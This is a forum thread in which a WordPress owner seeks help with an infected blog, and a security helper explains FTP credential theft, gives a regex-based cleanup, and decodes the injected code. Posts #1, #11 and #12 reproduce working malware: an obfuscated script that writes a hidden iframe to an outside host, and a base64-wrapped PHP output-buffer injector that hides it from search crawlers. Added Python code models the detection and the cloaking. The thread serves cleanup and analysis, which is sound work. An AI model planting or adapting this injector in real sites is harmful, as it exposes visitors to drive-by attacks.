
Thread: my WordPress blog has been hacked

#1 bababooey

    Oh man, this sucks so bad!

    Check the bottom of your source code; if it has this, you're infected too.

    <script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>

    I have no idea how to clean it up. I guess I'll give GoDaddy a call tomorrow, but I hope all my visitors don't think I'm trying to hack them. Ahh.

#2 Dee

    What does it do to your blog? Do you have any idea how it happened?
    Do you need help setting up Wordpress and/or the Thesis theme?
    Do you need help with writing or editing content?
    I can help. Low Fees. PM me.

#3 WeWatch

    This typically is the result of a virus

    The virus is on a PC with FTP access to your website. The virus steals FTP login credentials, sends them to a server which connects to the website with valid credentials, downloads either all of the files or only a select few, infects them then uploads them to the server.

    For Wordpress blogs you should also scan all .php files for a string that looks like:

    PHP Code:
    <?php eval(base64_decode(...
    and then a long list of characters. Typically when the hackers obtain access to a website, they put this code in some .php files. This gives them remote access to your website - yes, they can then re-infect the website without ever logging back in.

    If you have all of the files saved on your PC, you can check them for infectious code but also please check all the files on your server. Sometimes they'll inject the above code I showed into existing .php files and sometimes they'll also create bogus files with nothing but their malscript in it.

    Quite often these stand alone files are in an images folder and sometimes they're named gifimg.php. Look in all images folders but also check all .php files as they do inject it either at the very top or the very bottom of a file.

    As far as the virus goes, it knows how to evade detection by the currently installed anti-virus program. So you may have to install something different. I've had good success recommending Avast, F-Prot or Kaspersky. However, remember, the virus knows how to evade detection by the currently installed anti-virus, so if you already have one of these installed, you'll have to install one of the other ones. Kaspersky doesn't like other anti-virus programs installed, so you may have to uninstall your current anti-virus program if you're going to use Kaspersky.

    The virus works because quite possibly you're using an FTP program that stores the username and password combinations in a plain text file. This is quite common with the free versions. The following all store the login credentials in a plain text (unencrypted) format:

    1. CoffeeCup Direct FTP
    2. TransSoft FTP Control 4
    3. Core FTP
    4. GlobalScape CuteFTP
    5. Far Manager (with FTP plugin)
    6. FileZilla
    7. FlashFXP
    8. SmartFTP
    9. FTP Navigator
    10. Total Commander

    I use WS_FTP by Ipswitch because it encrypts the login credentials so they can't be stolen - so easily.

    Post back here if you have further questions or updates - please.
    WeWatchYourWebsite - so you don't have to.
    http://www.wewatchyourwebsite.com
    Website Security for Those Who Specialize in Something Else

#4 Kevtheman

    I don't use WordPress, but I was wondering if my site is safe. I use Dreamweaver, but don't use the built-in FTP. I use the FTP in cPanel and log in each time I need to upload files. Is there only a threat if your information is stored in a text file, or would I be at risk?
    Photoshop-Flash-Dreamweaver-Illustrator-PHP-MySQL Tutorials
    RiverCityGraphix: Youtube | Website | Twitter

    Do you take great photos? Consider selling them at Dreamstime or Shutterstock.

#5 WeWatch

    You're not susceptible to that method of stealing passwords; however, the virus works in many other ways.

    First, it looks to steal the passwords from plain text files, if that doesn't work some of the variants will also act as a keyboard logger. So as you type your credentials in, it steals them.

    It also acts as a sniffer. FTP transmits all data in plain text including the usernames and passwords. So it's easy for the virus to see and steal that information as well.

    Last, we've seen where the virus will inject the malscript into the data stream as it's leaving the PC. The files on the PC are clean. By the time the files get to the website, they're infected. These guys might be crooks, but they're geniuses as well.

    Bottom line, scan your PCs for viruses - constantly.

#6 Dee

    Hmm... I have used FileZilla occasionally. Most times I go through my host.

#7 bababooey

    Quote Originally Posted by WeWatch (post #3)
    Wow, thanks for all the info. Yes, it puts all this encrypted code into all the PHP files.

    I was using FileZilla. I've tried to go through all of the PHP files and remove their code, but it doesn't seem to work. I'm going to just delete everything from the FTP and reinstall WordPress.

    Hopefully that works.

#8 WeWatch

    You can use grepWin. It will find and delete all the .php malscripts with the base64_decode in them.

    grepWin is free. And if you already have the files on your PC, you can use it quite nicely.

    The regex string you'd use for the base64_decode string is:

    <\?php\s*eval\(base64_decode\([\'|\"].*?[\'|\"].*?\)\);\s*\?>

    Then set your Search in box to the folder where your files are saved. Select Regex search, use the string above in the Search for: box.

    Then set these options:

    uncheck Search case-sensitive
    check Dot match newline
    check Create backup files
    uncheck Treat files as UTF8
    select All sizes
    check Include system items
    check Include hidden items
    check Include subfolders

    Then select Search first to see the list of files in the Search results window. You can right-click on any one of them and open them in Wordpad to verify that the code is in that file.

    Then click on Replace. Since we didn't enter anything into the Replace with: box, it will simply remove that string.

    I've cleaned a lot of websites this way. I know it works.

    Or, if you just don't trust it, make sure you delete your entire website, after doing a full back-up. Don't just overwrite files on your site because you'll never know if you got all the backdoors or not.

    Let me know if you have questions or which way you decided to go.

    And I would get rid of FileZilla as well.
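The grepWin recipe in the post above, redone in Python as an added example (this is not WeWatch's tool or code). The first pattern is exactly the one posted in this thread, compiled with the two options the recipe calls for (case-insensitive, dot matches newline). The second pattern is a variant written for this example: the posted regex only allows whitespace between <?php and eval, so a block written as <?php /**/ eval(base64_decode(... (the form that appears later in this thread, in post #11) produces 0 matches; the variant also accepts a PHP block comment there. The sample file tree is constructed for the example and its base64 decodes to the harmless PHP statement echo 1;, standing in for the real multi-kilobyte blob. Like the "Create backup files" option, the cleaner writes a .bak copy before changing a file, and like "Replace with" left empty, it removes the matched block outright.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Pattern from the grepWin recipe in this thread, with the options it calls for:
# "Search case-sensitive" off and "Dot match newline" on.
GREPWIN_PATTERN = re.compile(
    r'<\?php\s*eval\(base64_decode\([\'|\"].*?[\'|\"].*?\)\);\s*\?>',
    re.IGNORECASE | re.DOTALL,
)

# Variant written for this example (not from the thread): also accepts PHP block
# comments between the tokens, so `<?php /**/ eval(base64_decode("..."));?>` is
# caught as well. The payload itself is restricted to base64 characters.
TOLERANT_PATTERN = re.compile(
    r'<\?php(?:\s|/\*.*?\*/)*eval\s*\(\s*base64_decode\s*\(\s*'
    r'[\'"][A-Za-z0-9+/=\s]*[\'"]\s*\)\s*\)\s*;(?:\s|/\*.*?\*/)*\?>',
    re.IGNORECASE | re.DOTALL,
)


def scan_tree(root, pattern):
    """Map each hit .php file (relative path) to where its matches sit:
    'top', 'bottom' or 'middle'. The thread notes the block is usually injected
    at the very top or the very bottom of a file, so that is worth reporting."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob('*.php')):
        text = path.read_text(encoding='utf-8', errors='replace')
        positions = []
        for m in pattern.finditer(text):
            if m.start() == 0:
                positions.append('top')
            elif m.end() >= len(text.rstrip()):
                positions.append('bottom')
            else:
                positions.append('middle')
        if positions:
            hits[path.relative_to(root).as_posix()] = positions
    return hits


def clean_file(path, pattern):
    """Remove every match from one file, keeping a .bak copy first (the grepWin
    'Create backup files' option). Returns the number of blocks removed."""
    path = Path(path)
    text = path.read_text(encoding='utf-8', errors='replace')
    cleaned, count = pattern.subn('', text)
    if count:
        shutil.copy2(path, path.with_name(path.name + '.bak'))
        path.write_text(cleaned, encoding='utf-8')
    return count


def clean_tree(root, pattern):
    """Apply clean_file to every .php file under root; return total removals."""
    return sum(clean_file(p, pattern) for p in list(Path(root).rglob('*.php')))


# Constructed sample tree (not real infected files). The base64 decodes to the
# harmless PHP `echo 1;`, standing in for the multi-kilobyte blob in the thread.
SAMPLE_FILES = {
    # Legitimate WordPress placeholder, must produce no hit.
    'index.php': '<?php\n// Silence is golden.\n?>\n',
    # Injection prepended to an existing theme file.
    'wp-content/themes/demo/footer.php': (
        '<?php eval(base64_decode("ZWNobyAxOw=="));?>\n'
        '<?php wp_footer(); ?>\n</body>\n</html>\n'
    ),
    # Stand-alone dropper in an images folder, written with the /**/ comment.
    'wp-content/uploads/images/gifimg.php':
        '<?php /**/ eval(base64_decode("ZWNobyAxOw=="));?>',
}


def build_sample_tree():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix='wp-scan-'))
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding='utf-8')
    return root


if __name__ == '__main__':
    root = build_sample_tree()
    print('grepWin pattern :', scan_tree(root, GREPWIN_PATTERN))
    print('tolerant pattern:', scan_tree(root, TOLERANT_PATTERN))
    print('removed', clean_tree(root, TOLERANT_PATTERN), 'blocks')
    print('after cleaning  :', scan_tree(root, TOLERANT_PATTERN))
```

Run against a local copy of the site (the thread's advice to work on the files saved on your PC applies): the posted pattern reports only footer.php, the tolerant one also reports gifimg.php. A clean scan afterwards says nothing about backdoors that use a different wrapper, which is why the post's fall-back advice of deleting the whole site after a full backup still stands.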

#9 bababooey

    First, thanks a lot for your help.

    I have tried grepWin and it does not catch anything. 0 matches.

    Last night I went through all of the PHP files and tried to clean them. However, I'm not 100% sure I got them all. I think I have, since my site is acting normal now and I can see the WordPress backend as I did before. The only thing that is wrong now is that the same HTML code is still at the bottom of my page source!

    Do you know how to get rid of it?

    And would you suggest a clean reinstall? Or are there any other options left?

    THANK YOU again

#10 WeWatch

    I would suggest a clean re-install. I can clean it but I need FTP access which is something not everyone is willing to provide.

    Something is generating that code so it might be some footer.php file or some file that is included toward the end in your template file.

    Don't forget the anti-virus information. Otherwise, you could be doing this all over again.

#11 bababooey

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsg ICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl 9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9l eGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgIC AgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FH RU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVk VSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAg ICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcH QiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2 RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2Ni U3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3 NCU3MCUzQSUyRiUyRiU2MiU2OSU2MiU3QSU2RiU3MCU2QyUyRS U2MyU2RiU2RCUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3 NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OC U3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2 NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RC U2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAg ICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIW Z1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5j dGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4Rj YxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZC MjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMU I0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAg ICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MT A7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2 NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMz BBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2 NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3 RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMs MTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMD dBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0 RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNk Y2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRF RkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzME IyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAg ICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT 1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2 
NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMj g4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFC OERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgIC AkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBz dHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Nj g0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1 QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4RE MxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJC RTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgIC AgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgy MkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCND k3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5 MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMz RBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNF KXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMk RBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2 ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rj k5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBm dW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NE VCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNv ZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMz Y5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFG NzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ1 9tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUy OEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZW dfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21s KCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3Qj U5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRS QTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKC k7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAg fSAgfQ=="));?>

    The code showing up in my PHP files.

#12 WeWatch

    Which decodes to:

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
        $GLOBALS['mr_no']=1;
        if(!function_exists('mrobh')){
            if(!function_exists('gml')){
                function gml(){
                    if(!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
                        return '<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>';
                    }
                    return "";
                }
            }
            if(!function_exists('gzdecode')){
                function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
                    $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
                    $RBE4C4D037E939226F65812885A53DAD9=10;
                    $RA3D52E52A48936CDE0F5356BB08652F2=0;
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
                        $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                        $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
                        $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
                        $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
                    }
                    if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
                        $RBE4C4D037E939226F65812885A53DAD9+=2;
                    }
                    $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
                    if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
                        $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
                    }
                    return $R034AE2AB94F99CC81B389A1822DA3353;
                }
            }
            function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
                Header('Content-Encoding: none');
                $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
                if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
                    return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
                }else{
                    return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
                }
            }
            ob_start('mrobh');
        }
    }

    Which, if you look at the stuff in the script tags, is what you're seeing.
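An added example (not part of WeWatch's post) that peels the two layers of the block decoded above in Python: eval(base64_decode("...")) hides PHP source, and inside it eval(unescape("%...")) hides the JavaScript that writes the 1x1 iframe. The PHP source used here is a constructed, cut-down stand-in for the 3 KB blob in post #11; it keeps only the gml() cloaking check and the percent-encoded string shown above, and is base64-wrapped in the same <?php /**/ eval(base64_decode( form. Forum line-wrap spaces are stripped before decoding, which the pasted blob also needs. The second half mirrors what the decoded mrobh() does once ob_start('mrobh') has registered it: the whole response is buffered and rewritten, the script goes in front of </body> for ordinary browsers, and visitors whose User-Agent contains googlebot or yahoo get nothing. That is why the script turns up at the bottom of the page source even when footer.php itself is clean (any included .php file still carrying the block is enough) and why a crawler would not see it. The names decode_injected_block, gml_like and mrobh_like are this example's own.

```python
import base64
import re
from urllib.parse import unquote

# Percent-encoded JavaScript carried inside the decoded gml() shown above,
# reproduced here with the forum's line-wrap spaces removed.
IFRAME_HEX = (
    '%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20'
    '%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F'
    '%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31'
    '%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'
    '%27%29%3B'
)

# Constructed stand-in for the blob in post #11 (not taken from a real file):
# a cut-down PHP source with the same gml() cloaking logic, then wrapped the way
# the injector wraps it, including the /**/ between <?php and eval.
SAMPLE_PHP = (
    'function gml(){'
    'if(!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&'
    '(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){'
    'return \'<script language="javascript">eval(unescape("' + IFRAME_HEX
    + '"))</script>\';}'
    'return "";}'
)
INJECTED_BLOCK = (
    '<?php /**/ eval(base64_decode("'
    + base64.b64encode(SAMPLE_PHP.encode()).decode()
    + '"));?>'
)

CLOAKED_AGENTS = ('googlebot', 'yahoo')


def decode_injected_block(php_text):
    """Peel both layers: base64 -> PHP source, then %XX -> JavaScript.
    Returns (php_source, javascript, iframe_src); the last two are '' if absent."""
    m = re.search(r'base64_decode\(\s*[\'"]([A-Za-z0-9+/=\s]+)[\'"]\s*\)', php_text)
    if not m:
        raise ValueError('no base64_decode payload found')
    # Pasted blobs carry wrap spaces; base64 never contains whitespace.
    php_source = base64.b64decode(re.sub(r'\s+', '', m.group(1))).decode('latin-1')
    js = ''
    m2 = re.search(r'unescape\(\s*[\'"]((?:%[0-9A-Fa-f]{2}|\s)+)[\'"]\s*\)', php_source)
    if m2:
        # JavaScript unescape() and URL percent-decoding agree for this ASCII payload.
        js = unquote(re.sub(r'\s+', '', m2.group(1)))
    m3 = re.search(r'src=["\']?([^"\'\s>]+)', js)
    src = m3.group(1) if m3 else ''
    return php_source, js, src


def gml_like(user_agent, js):
    """Mirror of the decoded gml(): crawlers get an empty string, everyone else
    gets the script tag (stristr is case-insensitive, hence lower())."""
    ua = user_agent.lower()
    if any(bot in ua for bot in CLOAKED_AGENTS):
        return ''
    return '<script language="javascript">' + js + '</script>'


def mrobh_like(page_html, user_agent, js):
    """Mirror of the decoded mrobh() output-buffer callback (gzip handling left
    out): the script is placed in front of every </body>, or appended when the
    page has none. ob_start() buffers the whole response, so the injection lands
    at the bottom of every page regardless of which included .php file carries
    the block."""
    tag = gml_like(user_agent, js)
    body_close = re.compile(r'(</body[^>]*>)', re.IGNORECASE | re.DOTALL)
    if body_close.search(page_html):
        return body_close.sub(lambda m: tag + '\n' + m.group(1), page_html)
    return page_html + tag


if __name__ == '__main__':
    php_src, js, src = decode_injected_block(INJECTED_BLOCK)
    print('decoded JavaScript:', js)
    print('iframe src        :', src)
    page = '<html><body><p>Hello</p></body></html>'
    print('browser sees :', mrobh_like(page, 'Mozilla/5.0 (Windows NT 6.1)', js))
    print('Googlebot sees:', mrobh_like(page, 'Mozilla/5.0 (compatible; Googlebot/2.1)', js))
```

Checking a suspect site with an ordinary browser User-Agent and again with one containing "googlebot" shows the difference directly; the cloaking also means "the site looks fine in search results" is not evidence that the injection is gone.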

#13 bababooey

    Hmm, I have ESET on my computer, but I think I have a virus on it. Every time I download WordPress and extract it, it's already hacked.

    It comes with index files with the code below in them.

    <?php
    // Silence is golden.
    ?>

    I'm doing a clean reinstall now; hopefully that will finally work.

#14 bababooey

    UPDATE: after 2 hours of uninstalling WordPress, reinstalling, importing all of the posts back, uploading the pictures and video back... after all that it's still hacked...

    I see no solution.

#15 WeWatch

    If that's your concern, know that those files are legitimate.

    I don't claim to be a WordPress expert, but those "Silence is golden" lines are legitimate.
